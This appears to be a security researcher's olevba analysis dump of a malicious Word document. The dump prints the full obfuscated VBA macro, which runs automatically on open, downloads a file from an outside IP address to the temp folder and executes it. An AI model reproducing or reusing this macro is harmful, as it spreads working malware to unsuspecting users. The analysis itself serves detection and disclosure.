dynamoo

Malicious Word macro

Apr 1st, 2015
olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename                                                        
----------- -----------------------------------------------------------------
OLE:MAS---- 09.doc

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: 09.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: 09.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
M74TMHsK391U17
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: 09.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Function RaSfP6r1363354I(ByVal PzRG5z7lX09IgN5jL2 As String, ByVal PF5ZVO1vjpV4jr0SV9QERY3q3 As String) As Boolean
Dim sSt9btW4T0Q9CRYn As Object, PJZVvQ3ZZA As Long, JJ11x8 As Long, PN10dD65K61UuEYF53() As Byte
Set sSt9btW4T0Q9CRYn = CreateObject(ChrW(38.5 + 38.5) & ChrW(41.5 + 41.5) & ChrW(44 + 44) & ChrW(38.5 + 38.5) & ChrW(38 + 38) & ChrW(25 + 25) & ChrW(23 + 23) & ChrW(44 + 44) & ChrW(38.5 + 38.5) & ChrW(38 + 38) & ChrW(36 + 36) & ChrW(42 + 42) & ChrW(42 + 42) & ChrW(40 + 40))
sSt9btW4T0Q9CRYn.Open ChrW(35.5 + 35.5) & ChrW(34.5 + 34.5) & ChrW(42 + 42), PzRG5z7lX09IgN5jL2, False
sSt9btW4T0Q9CRYn.Send "e"
PN10dD65K61UuEYF53 _
 = sSt9btW4T0Q9CRYn.responseBody
JJ11x8 = FreeFile
Open _
 PF5ZVO1vjpV4jr0SV9QERY3q3 For _
 Binary Access _
 Write Lock Write As #JJ11x8
Put #JJ11x8, , PN10dD65K61UuEYF53
Close #JJ11x8
Set GFCUTFUf87TGUbjdfgfdg = CreateObject(ChrW(41.5 + 41.5) & ChrW(52 + 52) & ChrW(50.5 + 50.5) & ChrW(54 + 54) & ChrW(54 + 54) & ChrW(23 + 23) & ChrW(32.5 + 32.5) & ChrW(56 + 56) & ChrW(56 + 56) & ChrW(54 + 54) & ChrW(52.5 + 52.5) & ChrW(49.5 + 49.5) & ChrW(48.5 + 48.5) & ChrW(58 + 58) & ChrW(52.5 + 52.5) & ChrW(55.5 + 55.5) & ChrW(55 + 55))
GFCUTFUf87TGUbjdfgfdg.Open _
 Environ(ChrW(42 + 42) & ChrW(34.5 + 34.5) & ChrW(38.5 + 38.5) & ChrW(40 + 40)) & ChrW(46 + 46) & ChrW(34 + 34) & ChrW(39.5 + 39.5) & ChrW(43.5 + 43.5) & ChrW(42.5 + 42.5) & ChrW(36.5 + 36.5) & ChrW(32.5 + 32.5) & ChrW(32.5 + 32.5) & ChrW(35 + 35) & ChrW(40.5 + 40.5) & ChrW(42 + 42) & ChrW(32.5 + 32.5) & ChrW(23 + 23) & ChrW(50.5 + 50.5) & ChrW(60 + 60) & ChrW(50.5 + 50.5)
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------+-----------------------------------------+
| Type       | Keyword      | Description                             |
+------------+--------------+-----------------------------------------+
| Suspicious | CreateObject | May create an OLE object                |
| Suspicious | Open         | May open a file                         |
| Suspicious | Environ      | May read system environment variables   |
| Suspicious | Write        | May write to a file (if combined with   |
|            |              | Open)                                   |
| Suspicious | Put          | May write to a file (if combined with   |
|            |              | Open)                                   |
| Suspicious | ChrW         | May attempt to obfuscate specific       |
|            |              | strings                                 |
| Suspicious | Binary       | May read or write a binary file (if     |
|            |              | combined with Open)                     |
+------------+--------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: 09.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub M74TMHsK391U17()
RaSfP6r1363354I ChrW(52 + 52) & ChrW(58 + 58) & ChrW(58 + 58) & ChrW(56 + 56) & ChrW(29 + 29) & ChrW(23.5 + 23.5) & ChrW(23.5 + 23.5) & ChrW(28.5 + 28.5) & ChrW(24.5 + 24.5) & ChrW(23 + 23) & ChrW(25 + 25) & ChrW(26 + 26) & ChrW(25 + 25) & ChrW(23 + 23) & ChrW(24.5 + 24.5) & ChrW(27 + 27) & ChrW(25.5 + 25.5) & ChrW(23 + 23) & ChrW(27.5 + 27.5) & ChrW(28 + 28) & ChrW(23.5 + 23.5) & ChrW(57.5 + 57.5) & ChrW(56.5 + 56.5) & ChrW(59.5 + 59.5) & ChrW(50.5 + 50.5) & ChrW(57 + 57) & ChrW(50.5 + 50.5) & ChrW(23.5 + 23.5) & ChrW(49.5 + 49.5) & ChrW(48.5 + 48.5) & ChrW(57.5 + 57.5) & ChrW(54.5 + 54.5) & ChrW(48.5 + 48.5) & ChrW(23 + 23) & ChrW(51.5 + 51.5) & ChrW(52.5 + 52.5) & ChrW(51 + 51), _
 Environ(ChrW(42 + 42) & ChrW(34.5 + 34.5) & ChrW(38.5 + 38.5) & ChrW(40 + 40)) & ChrW(46 + 46) & ChrW(34 + 34) & ChrW(39.5 + 39.5) & ChrW(43.5 + 43.5) & ChrW(42.5 + 42.5) & ChrW(36.5 + 36.5) & ChrW(32.5 + 32.5) & ChrW(32.5 + 32.5) & ChrW(35 + 35) & ChrW(40.5 + 40.5) & ChrW(42 + 42) & ChrW(32.5 + 32.5) & ChrW(23 + 23) & ChrW(50.5 + 50.5) & ChrW(60 + 60) & ChrW(50.5 + 50.5)
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+---------+-----------------------------------------+
| Type       | Keyword | Description                             |
+------------+---------+-----------------------------------------+
| Suspicious | Environ | May read system environment variables   |
| Suspicious | ChrW    | May attempt to obfuscate specific       |
|            |         | strings                                 |
+------------+---------+-----------------------------------------+